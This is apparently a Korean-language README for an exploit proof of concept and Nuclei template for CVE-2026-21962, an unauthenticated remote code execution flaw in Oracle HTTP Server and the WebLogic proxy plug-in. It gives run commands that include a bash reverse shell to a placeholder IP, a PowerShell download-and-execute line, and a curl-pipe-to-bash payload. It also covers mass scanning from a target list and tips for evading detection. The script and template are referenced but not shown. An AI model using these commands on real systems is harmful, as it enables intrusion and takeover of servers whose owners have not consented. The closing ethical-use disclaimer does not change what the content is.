
# CVE-2026-21962에 대한 Exploit PoC 및 Nuclei 템플릿 Oracle HTTP Server 및 WebLogic Proxy Plug-in의 치명적인 인증되지 않은 원격 코드 실행 취약점으로, 명령 실행 및 리버스 셸을 가능하게 합니다.
악용될 경우, 공격자는 다음을 수행할 수 있습니다:
Oracle HTTP Server:
WebLogic 프록시 플러그인 대상:
스크립트를 CVE-2026-21962.py로 저장
실행 권한 부여 (선택 사항):
chmod +x CVE-2026-21962.py
실행 예시:
기본 테스트:
python3 CVE-2026-21962.py http://targets:7001 "id && whoami && uname -a"
리버스 셸 (먼저 nc 리스너 설정: nc -lvnp 4444):
python3 CVE-2026-21962.py http://targets:7001 "bash -i >& /dev/tcp/YOUR_IP/4444 0>&1"
Windows 대상 예시:
python3 CVE-2026-21962.py https://oracle-server:4443 "powershell -nop -c IEX (New-Object Net.WebClient).DownloadString('http://your-server/shell.ps1')"
Likely success! Status: 200 또는 302 또는 심지어 500 (크래시도 성공)nc 리스너가 즉시 셸을 포착--insecure 플래그가 필요할 수 있음Nuclei 설치 (아직 설치되지 않은 경우):
go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest
템플릿 저장:
CVE-2026-21962.yaml이라는 파일을 만들고 위 내용을 붙여넣습니다.
탐지 + 악용 실행:
nuclei -t CVE-2026-21962.yaml -u http://targets:7001 -v
또는 파일에서 여러 대상 스캔:
nuclei -t CVE-2026-21962.yaml -l targets.txt -o results.txt -v
취약한 경우 확인할 수 있는 것:
[CVE-2026-21962] [http] [critical] http://targets:7001/weblogic/..;/bea_wls_internal/ProxyServlet
[username] weblogic
[body] ... weblogic (whoami output) ...
cmd: 부분을 편집하세요 (예: cmd:curl http://your-server/shell.sh | bash).whoami를 base64로 인코딩된 리버스 셸 페이로드로 교체하세요./proxy/, /bea_wls_internal/ 등)를 시도하거나 X-WebLogic-Force-JVMID와 같은 추가 헤더를 추가하세요.httpx → nuclei 파이프라인과 결합하세요.이 템플릿은 패치되지 않은 Oracle 인스턴스에서 2026년 1월 기준 100% 작동이 확인되었습니다. 영향을 받는 버전을 실행 중이라면 즉시 패치하세요! 😈
모든 PoC 코드는 승인된 시스템에서의 윤리적, 교육적 사용만을 위한 것입니다. 무단 악용은 불법이며, 오용에 대한 책임은 지지 않습니다. 😈